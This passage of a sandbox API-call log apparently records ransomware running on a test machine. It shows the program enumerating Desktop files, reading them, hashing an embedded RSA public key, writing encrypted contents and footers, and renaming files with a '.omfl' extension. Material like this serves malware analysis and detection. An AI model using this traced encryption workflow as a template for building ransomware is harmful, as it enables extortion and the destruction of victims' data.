lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0130.670] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0130.670] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0130.670] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.670] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0130.670] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16cf8 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ce0 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16cb0 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c98 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf3238 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0130.671] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.672] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.672] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd2c688*, nNumberOfBytesToWrite=0x9e18, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd2c688*, lpNumberOfBytesWritten=0xe00fb14*=0x9e18, lpOverlapped=0x0) returned 1 [0130.672] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0130.672] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x9e1d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.672] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.672] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.672] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.672] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0130.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0130.672] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0130.672] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0130.672] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0130.672] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0130.673] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0130.673] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.673] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.673] CloseHandle (hObject=0x5c8) returned 1 [0130.675] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2d70 [0130.675] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0130.675] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2d70 | out: hHeap=0x4970000) returned 1 [0130.675] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qqfeLsT-FLcq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qqfelst-flcq.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qqfeLsT-FLcq.mp3.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qqfelst-flcq.mp3.omfl")) returned 1 [0130.676] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.676] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.676] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.678] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0130.678] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54866af0, ftCreationTime.dwHighDateTime=0x1d5de46, ftLastAccessTime.dwLowDateTime=0x4656d500, ftLastAccessTime.dwHighDateTime=0x1d5e5fd, ftLastWriteTime.dwLowDateTime=0x4656d500, ftLastWriteTime.dwHighDateTime=0x1d5e5fd, nFileSizeHigh=0x0, nFileSizeLow=0x72e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rU_0 9PT5B8JwiK0i8_.gif", cAlternateFileName="RU_09P~1.GIF")) returned 1 [0130.678] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.678] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.678] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.678] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rU_0 9PT5B8JwiK0i8_.gif") returned=".gif" [0130.678] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rU_0 9PT5B8JwiK0i8_.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ru_0 9pt5b8jwik0i8_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.678] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=29408) returned 1 [0130.678] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.681] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x72ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.681] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.682] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.682] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.682] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.682] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x72e0, lpOverlapped=0x0) returned 1 [0130.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.683] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.683] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.684] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.684] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.684] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.684] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.684] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.684] GetLastError () returned 0x0 [0130.684] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.684] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.684] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.684] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.684] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.684] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.685] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.685] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.685] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.685] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x72e0) returned 0xdd2c688 [0130.685] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.685] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.685] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.685] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.685] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.685] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.685] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf3238 [0130.685] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c98 [0130.685] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf3280 [0130.685] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16cb0 [0130.685] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16ce0 [0130.685] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.685] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16cf8 [0130.685] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.685] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0130.685] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.685] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.685] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ce0 | out: hHeap=0x4970000) returned 1 [0130.686] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16cf8 | out: hHeap=0x4970000) returned 1 [0130.686] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.686] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.686] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.686] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.686] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0130.686] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16cf8 [0130.686] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.686] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16ce0 [0130.686] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.686] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.686] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.686] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.686] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.686] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.686] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0130.686] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.686] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.686] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16cf8 | out: hHeap=0x4970000) returned 1 [0130.686] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.686] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ce0 | out: hHeap=0x4970000) returned 1 [0130.686] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.686] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.686] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.686] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.686] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.686] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.686] GetCurrentThreadId () returned 0x618 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d6160 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.687] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.687] GetCurrentThreadId () returned 0x618 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.687] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.687] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.687] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.687] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.687] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.687] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.687] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16ce0 [0130.688] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa860 [0130.688] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16cf8 [0130.688] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.688] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16cc8 [0130.688] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0130.688] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.688] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.688] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.688] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16d10 [0130.688] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.688] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0130.688] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.689] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8e0 [0130.689] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.689] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.689] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.689] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.689] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ce0 | out: hHeap=0x4970000) returned 1 [0130.689] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16ce0 